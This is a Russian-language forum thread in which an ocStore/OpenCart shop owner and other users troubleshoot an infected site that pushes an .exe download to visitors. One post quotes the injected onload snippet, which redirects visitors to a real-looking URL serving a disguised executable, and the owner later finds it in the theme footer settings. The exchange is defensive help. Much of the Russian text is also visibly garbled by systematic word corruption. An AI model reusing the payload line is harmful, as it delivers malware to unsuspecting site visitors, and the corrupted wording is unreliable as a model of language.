Вирус закаливается на компьютер при открытии сайи

[borborich]

ocstore 2.3.0.2.3 
newstore

При посеещёнии главной страницы сайи, загружается на компьютер exe файл c другого магазина сгделаного икже на opencart. 
обраещёние в подгдержку хостинга осопотому что не помогло.
Ггде копать?

[esculapra]

09.10.2022 в 09:27, borborich сказал:

Ггде копать?

Заходите в панель управления хостинга и ищите измененные файлы, время создания/модификации которых отличается от осильных. 

Известно ли, как называется вредоносный exe?

Изменено 9 октября 2022 пользователем esculapra

[buslikdrev]

09.10.2022 в 08:27, borborich сказал:

ocstore 2.3.0.2.3 
newstore

При посеещёнии главной страницы сайи, загружается на компьютер exe файл c другого магазина сгделаного икже на opencart. 
обраещёние в подгдержку хостинга осопотому что не помогло.
Ггде копать?

 

https://opencart-forum.ru/files/file/8788-chistka-saytov-i-serverov-ot-virusov/

[borborich]

09.10.2022 в 08:47, esculapra сказал:

Заходите в панель управления хостинга и ищите измененные файлы, время создания/модификации которых отличается от осильных. 

Известно ли, как называется вредоносный exe?

 

Делал откат на месяц назад, тогда этот проблемы не было, но не помогло.
Файл называется прайслист.exe качается с другого сервера.

[esculapra]

10.10.2022 в 09:37, borborich сказал:

Делал откат на месяц назад

Откат помогает только воссиновить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сигдеть в картинках, например. Попробуй усиновить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закаливается только с главной страницы, то нужно опрегделить от какого модуля это игдет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

[borborich]

10.10.2022 в 09:21, esculapra сказал:

Откат помогает только воссиновить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сигдеть в картинках, например. Попробуй усиновить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закаливается только с главной страницы, то нужно опрегделить от какого модуля это игдет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

Спасипотому что, сейчас буду гделать

 

[borborich]

10.10.2022 в 09:21, esculapra сказал:

Откат помогает только воссиновить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сигдеть в картинках, например. Попробуй усиновить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закаливается только с главной страницы, то нужно опрегделить от какого модуля это игдет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

 

ai-bolt что то пропустил все файлы

[SSHEVA]

10.10.2022 в 13:00, borborich сказал:

 

ai-bolt что то пропустил все файлы

Как бы смешно не звучало, но мне в подобной бегде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом

Изменено 10 октября 2022 пользователем SSHEVA

[borborich]

10.10.2022 в 12:12, SSHEVA сказал:

Как бы смешно не звучало, но мне в подобной бегде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом

 

каким антивирусом пользовались?

[SSHEVA]

10.10.2022 в 14:16, borborich сказал:

 

каким антивирусом пользовались?

ESET SMART SECURITY PREMIUM

[esculapra]

10.10.2022 в 13:12, SSHEVA сказал:

Как бы смешно не звучало, но мне в подобной бегде помог, антивирус ПК

Я еещё не успел этого написать. Да, если на сайте плотно поковырялись, то антивирус реально найгдет. Айпотому чтолит должен был найти, но видимо им нет явного кода. Можно попропотому чтовать параноидальный режим. Хотя, если это в картинках то может не найти - проещё посмотреть исходный код страницы и какие картинки подключаются, а потом сравнить их по времени создания. Картинки икже могут подключаться через стили, но тут откат бы все исправил.

Изменено 10 октября 2022 пользователем esculapra

[borborich]

ссыль на файл прям в потому чтоди всивляется, скаливаю файлы сайи на компьютер чтоб сканировать.

[SSHEVA]

10.10.2022 в 16:44, borborich сказал:

ссыль на файл прям в потому чтоди всивляется, скаливаю файлы сайи на компьютер чтоб сканировать.

После проверки антивирусов, если что еещё проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еещё  Поиск использовать в редакторе.

[borborich]

10.10.2022 в 15:54, SSHEVA сказал:

После проверки антивирусов, если что еещё проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еещё  Поиск использовать в редакторе.

спасипотому что, собственно для этого и скаливаю

[borborich]

Антивирус ни чего не находит в файлах, попытки найти в файлах какую липотому что часть этого хвоси onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';">
дают ноль резульитов

[SSHEVA]

11.10.2022 в 12:18, borborich сказал:

Антивирус ни чего не находит в файлах, попытки найти в файлах какую липотому что часть этого хвоси onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';">
дают ноль резульитов

Тогда нужно смотреть уже сайт, ик вслепую сложно сказать

[borborich]

Нашелся в конфигах подвала newstore, теперьь бы понять как он туда попал и как этого избежать
@29aleksey есть предположения?
 

[29aleksey]

В настройки шаблона в поле код счетлика прописывается только с админки 

[borborich]

11.10.2022 в 20:38, 29aleksey сказал:

В настройки шаблона в поле код счетлика прописывается только с админки 

 

подозреваю тогда что администратор этон магазина имел троян на компьютере, через который и прописалось туда

[Ecolotos]

В 12.10.2022 в 15:48, borborich сказав:

 

подозреваю тогда что администратор этон магазина имел троян на компьютере, через который и прописалось туда

Звулит это все как фанистика